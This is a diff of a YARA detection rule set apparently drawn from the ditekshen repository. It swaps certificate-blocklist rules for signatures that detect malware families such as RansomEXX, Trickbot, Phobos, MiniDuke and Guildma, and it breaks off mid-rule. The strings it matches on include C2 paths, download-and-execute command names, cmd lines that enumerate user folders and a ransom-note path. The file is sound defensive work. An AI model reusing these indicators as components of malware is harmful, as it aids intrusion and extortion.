-		id = "c7533bc5-7d83-550e-a36c-eb459f2be842"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "ef710c21-5c64-513e-b882-b5768478976e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6255-L6266"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3722-L3752"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "448527bcbe2851bffefabe06a58e3ca68c092a2080041c51acacad3d5119aa0c"
+		logic_hash = "91764dabfb40cb51914110de229ddb00cd565078fef83c825f7a86fa502fda37"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "eca61ad880741629967004bfc40bf8df6c9f0794"
-		importance = 20
+
+	strings:
+		$cmd1 = "Cmd_UPDATE" fullword ascii
+		$cmd2 = "Cmd_IDLE" fullword ascii
+		$cmd3 = "Cmd_EXE" fullword ascii
+		$cmd4 = "Cmd_VBS" fullword ascii
+		$cmd5 = "Cmd_JS" fullword ascii
+		$cmd6 = "Cmd_PWS" fullword ascii
+		$cmd7 = "Cmd_RAT" fullword ascii
+		$cmd8 = "Cmd_UNINST" fullword ascii
+		$cmd9 = "Cmd_RunDll" fullword ascii
+		$s1 = "ANSWER_OK" fullword ascii
+		$s2 = "GatherDFiles" ascii
+		$s3 = "CommandCd" fullword ascii
+		$s4 = "URL_GetCmd" fullword ascii
+		$s5 = "\"host\": \"{0}\", \"domain\": \"{1}\", \"user\": \"{2}\"" wide
+		$s6 = "pc_dns_host_name" wide
+		$s7 = "\"adinfo\": { \"adinformation\":" wide
+		$e1 = "//e:vbscript" wide
+		$e2 = "//e:jscript" wide
+		$e3 = "/c rundll32.exe" wide
+		$e4 = "/C powershell" wide
+		$e5 = "C:\\Windows\\System32\\cmd.exe" wide
+		$e6 = "echo del /f" wide
+		$e7 = "AT.U() {0}. format" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Mht Holding Vinderup ApS" and pe.signatures [ i ] . serial == "00:a7:3b:6d:82:1f:84:db:44:51:d6:ee:dd:62:c4:28:48" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $cmd* ) or 5 of ( $s* ) or all of ( $e* ) or 7 of them )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_500D76B1B4Bfaf4A131F027668Fea2D3 : FILE
+rule DITEKSHEN_MALWARE_Win_CHUWI_Seth : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "First sighting on 2020-01-05 didn't include ransomware artificats. Second sighting on 2020-01-24 with several correlations between the two samples now include ransomware artifacts."
 		author = "ditekSHen"
-		id = "670138fc-7f2f-5145-8488-196912292ef7"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "62af3cd3-59c3-580b-9d66-71fd4acfaf17"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6268-L6279"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3754-L3801"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "a4f626e5ae9d273723814b0d944b067e70714e10776600a1bd0f90af31c1146a"
+		logic_hash = "e6e3f5e9af093268667f67fec2176a943b35721e9f220804e176c6b5a3bb24e1"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
-		thumbprint = "fa491e71d98c7e598e32628a6272a005df86b196"
-		importance = 20
+		snort2_sid = "920103-920105"
+		snort3_sid = "920101-920103"
+
+	strings:
+		$cmd1 = "shell_command" fullword ascii
+		$cmd2 = "check_command" fullword ascii
+		$cmd3 = "down_exec" fullword ascii
+		$cmd4 = "open_link" fullword ascii
+		$cmd5 = "down_exec" fullword ascii
+		$cmd6 = "exe_link" fullword ascii
+		$cmd7 = "shellCommand" fullword ascii
+		$cmd8 = "R_CMMAND" fullword ascii
+		$cnc1 = "/check_command.php?HWID=" ascii
+		$cnc2 = "&act=get_command" ascii
+		$cnc3 = "/get_command.php?hwid=" ascii
+		$cnc4 = "&command=down_exec" ascii
+		$cnc5 = "&command=message" ascii
+		$cnc6 = "&command=open_link" ascii
+		$cnc7 = "&command=down_exec" ascii
+		$cnc8 = "&command=shell" ascii
+		$pdb = "\\Users\\CHUWI\\Documents\\CPROJ\\Downloader\\svchost" ascii
+		$rcnc1 = "inc/check_command.php" ascii
+		$rcnc2 = "inc/get_command.php" ascii
+		$rcnc3 = "php?btc" ascii
+		$rcnc4 = "php?hwid" ascii
+		$x1 = "> %USERPROFILE%\\Desktop\\HOW_DECRYPT_FILES.seth.txt" ascii
+		$x2 = "/C dir /b %USERPROFILE%\\Documents > %temp%\\doc.txt" ascii
+		$x3 = "/C dir /b %USERPROFILE%\\Desktop > %temp%\\desk.txt" ascii
+		$x4 = "/C dir /b %USERPROFILE%\\Downloads > %temp%\\downs.txt" ascii
+		$x5 = "/C dir /b %USERPROFILE%\\Pictures > %temp%\\pics.txt" ascii
+		$x6 = "for /F \"delims=\" %%a in ('mshta.exe \"%~F0\"') do set \"HTA=%%a\"" ascii
+		$x7 = "\\svchost.exe" fullword ascii
+		$x8 = ".seth" fullword ascii
+		$x9 = "MyAgent" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FviSBJQX" and pe.signatures [ i ] . serial == "50:0d:76:b1:b4:bf:af:4a:13:1f:02:76:68:fe:a2:d3" )
+		uint16( 0 ) == 0x5a4d and ( $pdb or 5 of ( $cmd* ) or 4 of ( $cnc* ) or all of ( $rcnc* ) or 5 of ( $x* ) or 8 of them )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_54Cd7Ae1C27F1421136Ed25088F4979A : FILE
+rule DITEKSHEN_MALWARE_Win_Gulpix : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Gulpix/HyperPlus backddor"
 		author = "ditekSHen"
-		id = "2f7a0a34-6650-59d1-acf9-5ded0317ee6f"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "b3dfd1d9-42fe-57d4-8047-135103689be7"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6281-L6292"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3803-L3832"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2b94ccd7f85a2b21edaf4b28f14827b399cdb82307c20320f77eb775c05751f1"
+		logic_hash = "5026726f093b31b444fc934ac1446b6c25f182b8714a37da05f4498f32a9a65f"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "acde047c3d7b22f87d0e6d07fe0a3b734ad5f8ac"
-		importance = 20
+
+	strings:
+		$x1 = "MainServer.dll" fullword ascii
+		$x2 = "NvSmartMax.dat" fullword wide
+		$x3 = "NvSmartMax.dll" fullword wide
+		$x4 = "http://+:80/FD873AC4-CF86-4FED-84EC-4BD59C6F17A7/" fullword wide
+		$s1 = "IP retriever" fullword wide
+		$s2 = "\\cmd.exe" fullword wide
+		$s3 = "\\msnetwork-cache.db" fullword wide
+		$s4 = "http://+:" wide
+		$s5 = "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" fullword wide
+		$s6 = "\\Microsoft\\Windows\\DiskCleanup\\SilentCleanup" ascii
+		$s7 = "Got a unknown request for %ws" wide
+		$s8 = "HttpReceiveRequestEntityBody failed with %lu" wide
+		$s9 = "FD873AC4-CF86-4FED-84EC-4BD59C6F17A7" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ABBYMAJUTA LTD LIMITED" and pe.signatures [ i ] . serial == "54:cd:7a:e1:c2:7f:14:21:13:6e:d2:50:88:f4:97:9a" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $x* ) or 6 of ( $s* ) or ( 2 of ( $x* ) and 4 of ( $s* ) ) or ( 2 of them and pe.exports ( "daemon" ) and pe.exports ( "run" ) and pe.exports ( "session" ) and pe.exports ( "work" ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_65Efa92A4164A3A2D888B5Cf8Ff073C8 : FILE
+rule DITEKSHEN_MALWARE_Linux_Ransomexx : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "07392a87-7d81-58c1-8dd6-2a9cbc8caa6b"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects RansomEXX ransomware"
+		author = "ditekshen"
+		id = "b449afc7-9055-55ed-a876-316d1aea8fee"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6294-L6305"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3834-L3858"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "189f154d5b71bea9c06cd2c79d2460a1fb8cc9e0670a9ef8545e3abad80c8a06"
+		logic_hash = "c233ccc3e741cb2c53f182c48093e41595a82a3f4e5bdb1dc0204f1f57b96c2a"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "928246cd6a0ee66095a43ae06a696b4c63c6ac24"
-		importance = 20
+		clamav_sig = "MALWARE.Linux.Ransomware.RansomEXX"
+
+	strings:
+		$c1 = "crtstuff.c" fullword ascii
+		$c2 = "cryptor.c" fullword ascii
+		$c3 = "ransomware.c" fullword ascii
+		$c4 = "logic.c" fullword ascii
+		$c5 = "enum_files.c" fullword ascii
+		$c6 = "readme.c" fullword ascii
+		$c7 = "ctr_drbg.c" fullword ascii
+		$s1 = "regenerate_pre_data" fullword ascii
+		$s2 = "g_RansomHeader" fullword ascii
+		$s3 = "CryptOneBlock" fullword ascii
+		$s4 = "RansomLogic" fullword ascii
+		$s5 = "CryptOneFile" fullword ascii
+		$s6 = "encrypt_worker" fullword ascii
+		$s7 = "list_dir" fullword ascii
+		$s8 = "ctr_drbg_update_internal" fullword ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ghisler Software GmbH" and pe.signatures [ i ] . serial == "65:ef:a9:2a:41:64:a3:a2:d8:88:b5:cf:8f:f0:73:c8" )
+		uint16( 0 ) == 0x457f and ( 5 of ( $c* ) or 6 of ( $s* ) or ( 3 of ( $c* ) and 3 of ( $s* ) ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_00Ad0A958Cdf188Bed43154A54Bf23Afba : FILE
+rule DITEKSHEN_MALWARE_Win_Trickbotmodule : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "0b42f6fd-732c-5802-b616-774a1da9e3aa"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Trickbot modules"
+		author = "ditekshen"
+		id = "c56c664f-5928-5e2e-ab06-0b9d504981be"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6307-L6321"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3860-L3881"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "6031cb276cbb419789a3f3e57654dd9569feb612b0aebc2b72ae8b644f07bca9"
+		logic_hash = "4d06653dad5f8a18598855212548364b3c3d2b68b99784846b494fcb1d1c8df9"
 		score = 75
-		quality = 75
+		quality = 50
 		tags = "FILE"
-		thumbprint = "7d851e785ad44eb15d5cdf9c33e10fe8f49616e8"
-		importance = 20
+
+	strings:
+		$mc = "<moduleconfig>" ascii
+		$s1 = "<autostart>" ascii
+		$s2 = "<nohead>" ascii
+		$s3 = "<needinfo" ascii
+		$s4 = "<conf ctl" ascii
+		$s5 = "<limit>" ascii
+		$w1 = "<sys>yes</sys>" ascii
+		$w2 = "<sys>no</sys>" ascii
+		$w3 = "<autostart>yes</autostart>" ascii
+		$w4 = "<autostart>no</autostart>" ascii
+		$w5 = "<nohead>yes</nohead>" ascii
+		$w6 = "<nohead>no</nohead>" ascii
+		$w7 = /<limit>\d+<\/limit>/ ascii
+		$w8 = "<moduleconfig> </moduleconfig" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "RHM Ltd" and ( pe.signatures [ i ] . serial == "ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" or pe.signatures [ i ] . serial == "00:ad:0a:95:8c:df:18:8b:ed:43:15:4a:54:bf:23:af:ba" ) )
+		uint16( 0 ) == 0x5a4d and $mc and ( 2 of ( $s* ) or ( 1 of ( $s* ) and 1 of ( $w* ) ) or 1 of ( $w* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_05Abac07F8D0Ce567F7D75Ee047Efee2 : FILE
+rule DITEKSHEN_MALWARE_Win_Gaudox : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "17355de3-08a9-585d-bc4f-fd16ff59e2a2"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Gaudox RAT"
+		author = "ditekshen"
+		id = "c60ac433-20a1-5f01-9447-fa99621bd9e2"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6323-L6334"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3883-L3893"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "0196ebd0b5821863c99676907a972e214f46411650fe20557e9f919609d12659"
+		logic_hash = "117ee89e264067ab3e695688872bbe7d83963731e877d04ac7e2505e64f6e793"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "68b32eac87652af4172e40e3764477437e5a5ce9"
-		importance = 20
+
+	strings:
+		$s1 = "hdr=%s&tid;=%s&cid;=%s&trs;=%i" ascii wide
+		$s2 = "\\\\\\\\.\\\\PhysicalDrive%u" ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Ultrareach Internet Corp." and pe.signatures [ i ] . serial == "05:ab:ac:07:f8:d0:ce:56:7f:7d:75:ee:04:7e:fe:e2" )
+		uint16( 0 ) == 0x5a4d and all of them
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_62165B335C13A1A847Ce9Acff2B29368 : FILE
+rule DITEKSHEN_MALWARE_Win_Phobos : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
-		author = "ditekSHen"
-		id = "62cd9a29-023d-5ff4-89cf-a2e74ec66ac4"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Phobos ransomware"
+		author = "ditekshen"
+		id = "7bf659ef-f2a1-5ee2-a334-c233e26a2526"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6336-L6347"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3895-L3908"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "19e189c49f435f8b2aca0944d0f648a4126f83b7498982a262230e2f69ada8b7"
+		logic_hash = "bbf8eef0863e9d6423b3b0f938561b2be486b92b4f59b5d0b67f52dba536a582"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "c4cfd244d5148c5b03cac093d49af723252b643c"
-		importance = 20
+
+	strings:
+		$x1 = "\\\\?\\UNC\\\\\\e-" fullword wide
+		$x2 = "\\\\?\\ :" fullword wide
+		$x3 = "POST" fullword wide
+		$s1 = "ELVL" fullword wide
+		$s2 = /SUP\d{3}/ fullword wide
+		$s3 = { 41 31 47 ?? 41 2b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "t55555Prh" and pe.signatures [ i ] . serial == "62:16:5b:33:5c:13:a1:a8:47:ce:9a:cf:f2:b2:93:68" )
+		uint16( 0 ) == 0x5a4d and all of ( $x* ) and 1 of ( $s* )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_4Cdffb4F02C55Ae60A099652605Da274 : FILE
+rule DITEKSHEN_MALWARE_Win_Ratty : FILE
 {
 	meta:
-		description = "Enigma Protector Demo Certificate"
-		author = "ditekSHen"
-		id = "843929be-68e5-56b0-99fc-f5d71b91c3cf"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		description = "Detects Ratty Java RAT"
+		author = "ditekshen"
+		id = "87719e28-dfe7-5366-8d90-65e6c0c6fb4f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6366-L6377"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3910-L3929"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "1b655f42302bed2091aaa5d37156c68eaf812f0c287bf42b24942a8b845b7476"
+		logic_hash = "d90bca1b18023da8e60cb6ca86d1c562bff3867c6d5cf893dce605ebb92b9637"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "4a2d33148aadf947775a15f50535842633cc3442"
-		importance = 20
+
+	strings:
+		$s1 = "/rat/RattyClient.class" ascii
+		$s2 = "/rat/ActiveConnection.class" ascii
+		$s3 = "/rat/attack/" ascii
+		$s4 = "/rat/gui/swing/Ratty" ascii
+		$s5 = "/rat/packet/PasswordPacket" ascii
+		$s6 = "/rat/packet/" ascii
+		$e1 = "/engine/Keyboard.class" ascii
+		$e2 = "/engine/IMouseListener.class" ascii
+		$e3 = "/engine/Screen$ResizeBehavior.class" ascii
+		$e4 = "/engine/fx/ISoundListener.class" ascii
+		$e5 = "/engine/net/TCPServer.class" ascii
+		$e6 = "/engine/noise/PerlinNoise.class" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DEMO" and pe.signatures [ i ] . serial == "4c:df:fb:4f:02:c5:5a:e6:0a:09:96:52:60:5d:a2:74" )
+		( uint16( 0 ) == 0x5a4d or uint16( 0 ) == 0xcfd0 or uint16( 0 ) == 0x4b50 ) and ( 3 of ( $s* ) or all of ( $e* ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_25Ad5Ae68C38Ad1021086F4Ffc8Ba470 : FILE
+rule DITEKSHEN_MALWARE_Win_Fatduke : FILE
 {
 	meta:
-		description = "Enigma Protector CA Certificate"
+		description = "Detects FatDuke"
 		author = "ditekSHen"
-		id = "6f1c6d3a-72a1-5c70-9c7d-1616b13767cd"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "dc80c0f0-c61c-5f0c-841b-3a75e8a1cef3"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6379-L6390"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3931-L3946"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "80b67b804e47fba825fabfee39f9a0aae78a4465b088c28b6f6972acd614bb89"
+		logic_hash = "a7923d15b10098e9402614fe7107a6ba1d71512efa6e462d522ef64e13f82b47"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "a04c0281bc2203a95ef9bd6d9736486449d80905"
-		importance = 20
+
+	strings:
+		$s1 = "\\\\?\\Volume" fullword ascii
+		$s2 = "WINHTTP_AUTOPROXY_OPTIONS@@PAUWINHTTP_PROXY_INFO@@" ascii
+		$s3 = "WINHTTP_CURRENT_USER_IE_PROXY_CONFIG@@" ascii
+		$s4 = "Cannot write a Cannot find the too long string mber of records Log malfunction! Cannot create ain an invalid ra Internal sync iright function iWaitForSingleObjffsets" ascii
+		$pattern = "()$^.*+?[]|\\-{},:=!" ascii
+		$b64 = "eyJjb25maWdfaWQiOi" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Enigma Protector CA" and pe.signatures [ i ] . serial == "25:ad:5a:e6:8c:38:ad:10:21:08:6f:4f:fc:8b:a4:70" )
+		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) or ( $b64 and 2 of them ) or ( #pattern > 3 and 2 of them ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_277Cd16De5D61B9398B645Afe41C09C7 : FILE
+rule DITEKSHEN_MALWARE_Win_Miniduke : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects MiniDuke"
 		author = "ditekSHen"
-		id = "d5ada3bf-322a-5794-aff7-75ff8dd9a7d1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "947cd414-d19d-5543-8961-94aef69cc94e"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6392-L6403"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3948-L3969"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "dccfd52a3bcc11897d05f5450600dbd2f1f699732341cebed6dda37a76fd5f2d"
+		logic_hash = "c3ab139b4fda2ff9678ceecbdf5ac0c57536bd658f62aa9d19610028b0a5f92c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "11a18b9ba48e2b715202def00c2005a394786b23"
-		importance = 20
+
+	strings:
+		$s1 = "DefPipe" fullword ascii
+		$s2 = "term %5d" fullword ascii
+		$s3 = "pid %5d" fullword ascii
+		$s4 = "uptime %5d.%02dh" fullword ascii
+		$s5 = "login: %s\\%s" fullword ascii
+		$s6 = "Software\\Microsoft\\ApplicationManager" ascii
+		$s7 = { 69 64 6c 65 ?? 00 73 74 6f 70 ?? 00 61 63 63 65 70 74 ?? 00 63 6f 6e 6e 65 63 74 ?? 00 6c 69 73 74 65 6e ?? 00 }
+		$net1 = "salesappliances.com" ascii
+		$net2 = "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36" fullword ascii
+		$net3 = "http://10." ascii
+		$net4 = "JiM9t8g7j8KoJkLJlKqka8dbo7q5z4v5u3o4z" ascii
+		$net5 = "application/octet-stream" ascii
+		$net6 = "Content-Disposition: form-data; name=\"%s\"; filename=\"%s\"" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "THE SIGN COMPANY LIMITED" and pe.signatures [ i ] . serial == "27:7c:d1:6d:e5:d6:1b:93:98:b6:45:af:e4:1c:09:c7" )
+		uint16( 0 ) == 0x5a4d and ( 5 of ( $s* ) or 4 of ( $net* ) or 7 of them )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_066276Af2F2C7E246D3B1Cab1B4Aa42E : FILE
+rule DITEKSHEN_MALWARE_Win_Polyglotduke : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects PolyGlotDuke"
 		author = "ditekSHen"
-		id = "32b8e28b-361f-53e5-b06c-504dd9e86ae9"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "01ac90db-35f6-5192-8630-81000573b4f9"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6405-L6416"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3971-L3986"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "2a554105ae99de388621adefb2f53d2d0873ac3175ca2ccf00fc6a498ea2fd29"
+		logic_hash = "c1fb8ea1d21768cbd65bd7b91e3f817fa97a0a933b511dff2ae4d5db49bdb2ec"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "dee5ca4be94a8737c85bbee27bd9d81b235fb700"
-		importance = 20
+
+	strings:
+		$s1 = { 48 b9 ff ff ff ff ff ff ff ff 51 48 23 8c 24 ?? 00 00 00 48 89 8C 24 00 00 00 00 }
+		$s2 = { 56 be ff ff ff ff 56 81 e6 7f }
+		$s3 = { 48 8b 05 19 ?4 4b 00 48 05 48 83 00 00 4c 8b 44 24 50 8b 54 24 48 48 8b }
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "IQ Trade ApS" and pe.signatures [ i ] . serial == "06:62:76:af:2f:2c:7e:24:6d:3b:1c:ab:1b:4a:a4:2e" )
+		uint16( 0 ) == 0x5a4d and ( all of ( $s* ) ) or ( 2 of them and pe.exports ( "InitSvc" ) )
 }
-
-rule DITEKSHEN_INDICATOR_KB_CERT_289051A83F350A2C600187C99B6C0A73 : FILE
+rule DITEKSHEN_MALWARE_Win_Guidlma : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificates"
+		description = "Detects Guildma"
 		author = "ditekSHen"
-		id = "f84a7749-a487-52e5-813b-e376ccde13d1"
-		date = "2024-10-04"
-		modified = "2024-10-04"
+		id = "135ddc6a-5001-54c0-a66c-3e0e5fe6319f"
+		date = "2024-11-01"
+		modified = "2024-11-01"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L6418-L6429"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/malware.yar#L3988-L4006"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f094e923dc53cc1edc6ac83cf69fb60fd3c564606a5bfb68facb482918399799"
+		logic_hash = "11a0d9c67139627b6820c928840d816ed22b48452ce0b2f856c86c183cdfc8ab"
 		score = 75
-		quality = 75
+		quality = 25
 		tags = "FILE"
-		thumbprint = "4e075adea8c1bcb9d10904203ab81965f4912ff0"
-		importance = 20
+
+	strings:
+		$v1_1 = "marxvxinhhm98.dll" fullword wide
+		$v1_2 = "marxvxinhhmxa.gif" fullword wide
+		$v1_3 = "marxvxinhhmxb.gif" fullword wide
+		$v1_4 = "c:\\programdata" fullword wide
+		$v1_5 = "\\tempa\\" fullword wide
+		$v2_1 = "C:\\Windows\\System32\\dllhost.exe" fullword ascii
+		$v2_2 = "C:\\Windows\\SysWOW64\\dllhost.exe" fullword ascii
+		$v2_3 = "C:\\Users\\Public\\go" fullword ascii
+		$v2_4 = ":%:*:/:>:C:H:W:\\:a:p:u:z:" fullword ascii
